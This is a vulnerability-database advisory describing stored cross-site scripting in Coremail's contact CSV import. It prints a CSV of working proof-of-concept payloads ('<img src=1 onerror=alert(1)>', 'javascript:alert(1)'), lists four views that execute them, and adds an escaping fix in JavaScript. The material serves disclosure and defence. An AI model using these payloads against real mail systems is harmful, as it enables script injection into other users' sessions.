ID SSV:94741
Type seebug
Reporter Root
Modified 2015-01-06T00:00:00
Description
Brief description:
Vulnerabilities should still be submitted to WooYun.
Details:
Coremail lets users import contacts into the personal address book; the import format is CSV.
[Screenshot 01.jpg: https://images.seebug.org/upload/201501/06151859d42791e1ad4cf5f545b14e12febd2e5c.jpg]
Import the following CSV:
联系组,姓名,电子邮件地址,住宅地址,住宅地址 邮政编码,住宅电话,移动电话,单位,商务地址,商务地址 邮政编码,商务电话,商务传真,生日,即时信息地址,网页,__cm_group
aa</textarea><img src=1 onerror=alert(1)>aaaaa,</textarea><img src=1 onerror=alert(1)>,</textarea><img src=1 onerror=alert(1)>@qq.com,,,,13132132132,<img src=1 onerror=alert(1)>,<img src=1 onerror=alert(1)>,,<img src=1 onerror=alert(1)>,,19881212,<img src=1 onerror=alert(1)>,javascript:alert(1)
,,,,,,,,,,,,,,,FRIENDS=<img src=1 onerror=alert(1)>
,,,,,,,,,,,,,,,FAMILY=<img src=1 onerror=alert(1)>
,,,,,,,,,,,,,,,COWORKERS=<img src=1 onerror=alert(1)>
,,,,,,,,,,,,,,,NETFRIENDS=网友
,,,,,,,,,,,,,,,VIP=重要联系人
As the screenshot shows, the main page escapes the values and nothing is triggered:
[Screenshot 02.jpg: https://images.seebug.org/upload/201501/061520502dc102db7e51d63b6f3d9480c88a5c34.jpg]
However, the individual feature pages all trigger the payload, as listed below:
1. Triggered when creating a new contact group:
[Screenshot 08.jpg: https://images.seebug.org/upload/201501/06152844f9752692c7b32a4850bca83e4ab6cfa4.jpg]
[Screenshot 03.jpg: https://images.seebug.org/upload/201501/0615230486304b27eb3bf9e914cfcd05cdce71c4.jpg]
2. Triggered when printing contacts:
[Screenshot 04.jpg: https://images.seebug.org/upload/201501/061524361b7ae99ea4d1ce42cbbf797747868921.jpg]
[Screenshot 05.jpg: https://images.seebug.org/upload/201501/0615252783c090ebc26355a0d358bd03a707a024.jpg]
3. Triggered when editing a group:
[Screenshot 06.jpg: https://images.seebug.org/upload/201501/06152802a91b0282e0aa0cd0035f13ef98d68af4.jpg]
[Screenshot 07.jpg: https://images.seebug.org/upload/201501/06152813553ed2a5f5bf7066f217c4ac265b2b95.jpg]
4. Triggered when clearing a contact's mail:
[Screenshot 09.jpg: https://images.seebug.org/upload/201501/06153120ab6cac00737986c8243b060409e05077.jpg]
[Screenshot 10.jpg: https://images.seebug.org/upload/201501/06153129247a30e8bf60788ef1af560154e45f1f.jpg]
Proof of vulnerability:
See the details above.
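The report shows the main list escaping imported values while the group, print and mail-clearing views do not. The following is an added defensive example, not code from Coremail or from the original report: it encodes the imported fields at each sink and restricts the web-page field to http(s). The view functions, field names and markup are hypothetical.

```javascript
// Added example: encode imported contact fields at every sink, not only the main list.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode a value for element content, <textarea> content and quoted attributes.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Allow only absolute http(s) URLs for the "web page" field; anything else is dropped.
function safeHref(value) {
  try {
    const url = new URL(String(value).trim());
    return (url.protocol === 'http:' || url.protocol === 'https:') ? url.href : '';
  } catch {
    return ''; // not an absolute URL
  }
}

// Hypothetical "edit group" view: the group name is placed inside a <textarea>.
function renderGroupEditor(groupName) {
  return `<textarea name="groupName">${escapeHtml(groupName)}</textarea>`;
}

// Hypothetical "print contact" view: name, e-mail, company and an optional link.
function renderPrintRow(contact) {
  const href = safeHref(contact.webPage);
  const link = href ? `<a href="${escapeHtml(href)}" rel="noopener">${escapeHtml(href)}</a>` : '';
  return `<tr><td>${escapeHtml(contact.name)}</td><td>${escapeHtml(contact.email)}</td>` +
         `<td>${escapeHtml(contact.company)}</td><td>${link}</td></tr>`;
}

// Constructed sample: field values copied from the CSV row shown in the report.
const imported = {
  group: 'aa</textarea><img src=1 onerror=alert(1)>aaaaa',
  name: '</textarea><img src=1 onerror=alert(1)>',
  email: '</textarea><img src=1 onerror=alert(1)>@qq.com',
  company: '<img src=1 onerror=alert(1)>',
  webPage: 'javascript:alert(1)',
};

console.log(renderGroupEditor(imported.group));
console.log(renderPrintRow(imported));
```

Escaping belongs in each view's rendering path, since the stored value is the same one that the main page already displays safely.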
Title Multiple stored XSS issues in a Coremail feature
Href https://www.seebug.org/vuldb/ssvid-94741
Published 2015-01-06T00:00:00